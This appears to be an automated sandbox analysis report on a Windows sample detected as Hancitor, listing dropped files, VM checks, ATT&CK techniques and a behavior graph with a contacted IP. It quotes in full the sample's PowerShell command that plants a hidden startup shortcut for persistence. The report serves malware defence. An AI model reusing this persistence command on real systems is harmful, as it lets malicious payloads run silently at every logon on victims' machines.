    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-convert-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fr-fr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\c2r32werhandler.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vccorlib140.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-timezone-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.pt-pt.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\IntegratedOffice.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.hr-hr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeOEMPlugin.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvSubsystemController.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2R64.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\concrt140.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sr-latn-rs.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\MavInject32.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.fr-ca.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.es-es.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ms-my.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\appvcleaner.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-xstate-l2-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\OfficeOEMPlugin.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\manageability.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5296Thread sleep count: 3899 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5296Thread sleep count: 2490 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1520Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: 872C.tmp, 00000003.00000003.1430152859.0000000001D42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: 872C.tmp, 00000003.00000003.1388768349.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389143678.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393216623.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1665092686.00000248C2B67000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2016772440.00000248C2B99000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013710001.00000248C2B5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: OfficeClickToRun.exe, 00000006.00000003.2016772440.00000248C2B99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWare, Inc.87:7021
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeMemory allocated: page read and write | page guardJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() "Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe officeclicktorun.exe platform=x86 culture=en-us productstoadd=o365homepremretail.16_en-us_x-none cdnbaseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version=16.0.18526.20168 mediatype=cdn sourcetype=cdn o365homepremretail.excludedapps=groove bitnessmigration=false deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=true scenario=clientupdate
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -command " $startupfolder = [system.environment]::getfolderpath('startup') $exepath = 'c:\users\public\music\script\918d.tmp' $shortcutpath = join-path -path $startupfolder -childpath 'asmus.lnk' $wscriptshell = new-object -comobject wscript.shell $shortcut = $wscriptshell.createshortcut($shortcutpath) $shortcut.targetpath = $exepath $shortcut.workingdirectory = split-path -parent $exepath $shortcut.windowstyle = 7 $shortcut.description = 'asmus' $shortcut.save() "
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe officeclicktorun.exe platform=x86 culture=en-us productstoadd=o365homepremretail.16_en-us_x-none cdnbaseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version.16=16.0.18526.20168 mediatype.16=cdn sourcetype.16=cdn o365homepremretail.excludedapps.16=groove bitnessmigration=false deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=true
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe officeclicktorun.exe platform=x86 culture=en-us productstoadd=o365homepremretail.16_en-us_x-none cdnbaseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version=16.0.18526.20168 mediatype=cdn sourcetype=cdn o365homepremretail.excludedapps=groove bitnessmigration=false deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=true scenario=clientupdateJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe officeclicktorun.exe platform=x86 culture=en-us productstoadd=o365homepremretail.16_en-us_x-none cdnbaseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version.16=16.0.18526.20168 mediatype.16=cdn sourcetype.16=cdn o365homepremretail.excludedapps.16=groove bitnessmigration=false deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=trueJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -command " $startupfolder = [system.environment]::getfolderpath('startup') $exepath = 'c:\users\public\music\script\918d.tmp' $shortcutpath = join-path -path $startupfolder -childpath 'asmus.lnk' $wscriptshell = new-object -comobject wscript.shell $shortcut = $wscriptshell.createshortcut($shortcutpath) $shortcut.targetpath = $exepath $shortcut.workingdirectory = split-path -parent $exepath $shortcut.windowstyle = 7 $shortcut.description = 'asmus' $shortcut.save() "Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Remote Access Functionality

    barindex
    Yara detected Hancitor
    Source: Yara matchFile source: Process Memory Space: sBvrNv0wtb.exe PID: 7632, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Command and Scripting Interpreter    		12
    Registry Run Keys / Startup Folder    		11
    Process Injection    		3
    Masquerading    		11
    Input Capture    		1
    Query Registry    		Remote Services11
    Input Capture    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		1
    DLL Side-Loading    		12
    Registry Run Keys / Startup Folder    		1
    Modify Registry    		LSASS Memory11
    Security Software Discovery    		Remote Desktop ProtocolData from Removable Media1
    Non-Standard Port    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		1
    Disable or Modify Tools    		Security Account Manager1
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook121
    Virtualization/Sandbox Evasion    		NTDS121
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Process Injection    		LSA Secrets1
    Application Window Discovery    		SSHKeylogging3
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Timestomp    		Cached Domain Credentials1
    File and Directory Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSync13
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637507 Sample: sBvrNv0wtb.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 48 52 star-azurefd-prod.trafficmanager.net 2->52 54 shed.dual-low.s-part-0039.t-0009.t-msedge.net 2->54 56 4 other IPs or domains 2->56 60 Yara detected Hancitor 2->60 62 Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation 2->62 64 Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE 2->64 9 sBvrNv0wtb.exe 2 2->9         started        12 OpenWith.exe 18 8 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\Local\Temp\918D.tmp, PE32+ 9->38 dropped 40 C:\Users\user\AppData\Local\Temp\872C.tmp, PE32 9->40 dropped 14 872C.tmp 9->14         started        16 918D.tmp 1 9->16         started        process6 dnsIp7 20 872C.tmp 19 36 14->20         started        50 141.98.10.54, 49698, 49701, 49702 HOSTBALTICLT Lithuania 16->50 34 C:\Users\Public\Music\...\918D.tmp (copy), PE32+ 16->34 dropped 23 powershell.exe 17 16->23         started        file8 process9 file10 66 Query firmware table information (likely to detect VMs) 20->66 26 OfficeClickToRun.exe 86 158 20->26         started        29 OfficeClickToRun.exe 20->29         started        36 C:\Users\user\AppData\Roaming\...\AsMus.lnk, MS 23->36 dropped 68 Powershell creates an autostart link 23->68 32 conhost.exe 23->32         started        signatures11 process12 dnsIp13 42 C:\Program Files\...\vcruntime140_1.dll, PE32+ 26->42 dropped 44 C:\Program Files\...\vcruntime140.dll, PE32+ 26->44 dropped 46 C:\Program Files\...\vccorlib140.dll, PE32+ 26->46 dropped 48 213 other files (none is malicious) 26->48 dropped 58 s-part-0039.t-0009.t-msedge.net 13.107.246.67, 443, 54614, 54619 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 29->58 file14

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.